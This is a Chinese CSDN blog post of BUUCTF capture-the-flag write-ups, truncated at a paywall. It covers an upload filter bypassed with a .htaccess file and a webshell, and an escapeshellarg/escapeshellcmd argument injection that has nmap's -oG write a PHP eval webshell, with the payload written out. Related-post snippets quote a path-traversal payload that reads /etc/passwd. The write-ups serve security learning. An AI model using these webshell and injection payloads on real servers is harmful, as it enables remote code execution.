[BUUCTF]刷题记录5

最新推荐文章于 2023-05-19 13:56:55 发布
VIP文章 最新推荐文章于 2023-05-19 13:56:55 发布
阅读量523 收藏
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/115382409
版权

[GXYCTF2019]BabyUpload

php后缀会被识别,所以只能传图片加htaccess来解析

上传png都失败,jpg是成功的
需要修改Content-Type为image/jpeg
直接传马,识别到有php标志,换script
在这里插入图片描述
在这里插入图片描述
/upload/893e5ad71a4b97784cc21ff87c648a47/jsphp.jpg

由于jpg无法解析,所以传.htaccess
在这里插入图片描述
开蚁剑拿到flag
在这里插入图片描述

BUUCTF 2018 Online Tool

  • 考察escapeshellarg()escapeshellcmd()的漏洞
  • 考察nmap是使用

这两个函数的漏洞
这两个函数的作用
本地测试一下

<?php
$host = $_GET['host'];
    echo $host."<br>";
    $host = escapeshellarg($host);
    echo $host."<br>";
    $host = escapeshellcmd($host);
    echo $host."<br>";

传入参数:127.0.0.1' -v -d a=1

  • 经过escapeshellarg()函数处理后变为:'127.0.0.1'\'' -v -d a=1',也就是将其中的’单引号转义,再用单引号将内容包含起来,让传入的值为一个字符串
  • 处理完的字符串再通过escapeshellcmd()函数的处理,变成:'127.0.0.1'\\'' -v -d a=1\',因为escapeshellcmd()函数对\以及最后的未闭合的’进行了转义
  • 最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1’。

这样加一个’就可以绕过这两个函数去执行我们的命令

nmap里面有个参数是-oG:实现将命令和结果写入文件
命令示例

127.0.0.1 <?php @eval();?> -oG hack.php

但是直接传是会被转义的
前后加上单引号,

'127.0.0.1 <?php @eval();?> -oG hack.php'

在这里插入图片描述
payload:?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

[GXYCTF2019]禁止套娃

  • githack

  • 无参数函数的rce

  • 正则表达式里面的(?R)?

访问了一下flag.php发现是存在的
没什么信息就尝试一下www.zip,果然有东西
在这里插入图片描述
被耍了
在这里插入图片描述
用dirmap扫了一下,发现有git泄露,开githack,得到index.php

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
   
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
   
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/'
最低0.47元/天 解锁文章
huamanggg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
JS自动生成速记符、拼音简写/拼音的声母(例如:“你挚爱的强哥”转换为“NZADQG”)。提取首字母,返回大写形式;提取拼音, 返回首字母大写形式(全拼)。
我驾驶汽车从不是为了从A点到达B点,我喜欢去感受汽车,与之交流,与之融为一体。
05-19 3万+
需要引用以下pinyin.js文件。
鉴于B站的代码粘贴没有全选功能,up在这里放上软件小妹的脚本代码
热门推荐
weixin_48456542的博客
07-24 5万+
油猴脚本软件小妹的脚本代码
一道 CTF 题 get 到的新姿势
hl1293348082的专栏
04-02 243
本文是从一个 CTF 题目中学到的一个新姿势,下面对我的学习做一个记录总结,给大家分享一下,希望大家多多参与一起分享学习。 题目描述 抓小鸡 MISC 题目(某比赛平台赛题) 刚开始拿到题目,打开 chm 后发现两个 pdf 文档,以为是 pdf 隐写,瞎搞了一段时间,发现自己粗心大意没看到题目提示 flag 就是小鸡的地址,根据题目提示怀疑是后门,之前没接触过 chm 后门,于是网上搜索一番,get 到新姿势。题目解题比较简单,直接 hh 反编译或者改后缀解压都能找到小鸡的地址。
BUUCTF笔记之Web系列部分WriteUp(四)
克格莫
06-24 1万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
PHP变量覆盖漏洞试验随笔
东隅的博客
09-15 424
PHP变量覆盖漏洞试验随笔
[BJDCTF2020]Mark loves cat
pakho_C的博客
04-15 783
web第41题 [BJDCTF2020]Mark loves cat 打开靶场: 一个个人网页,查看源码没有发现,尝试一波目录扫描 发现有.git目录,猜测存在.git源码泄露 参考[GXYCTF2019]禁止套娃的开始思路 利用GitHack将源码下载下来 由于环境有问题,index.php和flag.php文件下载不下来,只能得到assets文件夹 只好借用别人wp的源码: flag.php: <?php $flag = file_get_contents('/flag') index
[GXYCTF2019]禁止套娃
qq_64201116的博客
05-30 165
禁止套娃!!!我就套!!!我还要套好几个.....
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF web(六)
m0_46616663的博客
11-25 2669
[BJDCTF2020]ZJCTF,不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
BUUCTF(10.25-11.1)
qq_52988816的博客
11-23 3544
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
BUUCTF 19
qq_52431855的博客
02-01 467
知识点 PHP foreach循环 PHP foreach 循环结构是遍历数组时常用的方法,foreach 仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量或者未初始化的变量将发出错误信息。 foreach 有以下两种语法格式: //格式1 foreach (array_expression as $value){ statement } //格式2 foreach (array_expression as $key => $value){ statem...
2021年第一届 “东软杯”网络安全CTF竞赛-官方WriteUp(转)
渗透测试研究中心
12-22 2474
MISC1 签到难度 签到复制给出的flag输入即可2 range_download难度 中等flag{6095B134-5437-4B21-BE52-EDC46A276297}0x01分析dns流量,发现dns && ip.addr=1.1.1.1存在dns隧道数据,整理后得到base64:cGFzc3dvcmQ6IG5zc195eWRzIQ==解base64得到:passwo...
PHP---引用使用foreach(xxx as &$x)时候的坑。
疯狂老司机的博客
04-22 4878
注意如下一段代码:$data1 = ["1","2","3"]; $data2 = ["4","5","6"]; $all = 0; foreach($data1 as &amp;$x){ $all += $x } #注意这里$x是$data1最后一个元素的引用 $all2 = 0; foreach($data2 as $x=&gt;$y){ $all2 +=
sql注入时带引号屏蔽的怎么处理
Huamang的博客
02-09 4935
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号给过滤掉了,无法使用单引号来闭合 $sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'"; 要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\转义 用\转义后面的单引号 在用户名框输入\,密码框输入or 1=1 #,这样提交后,
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTF的Web真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值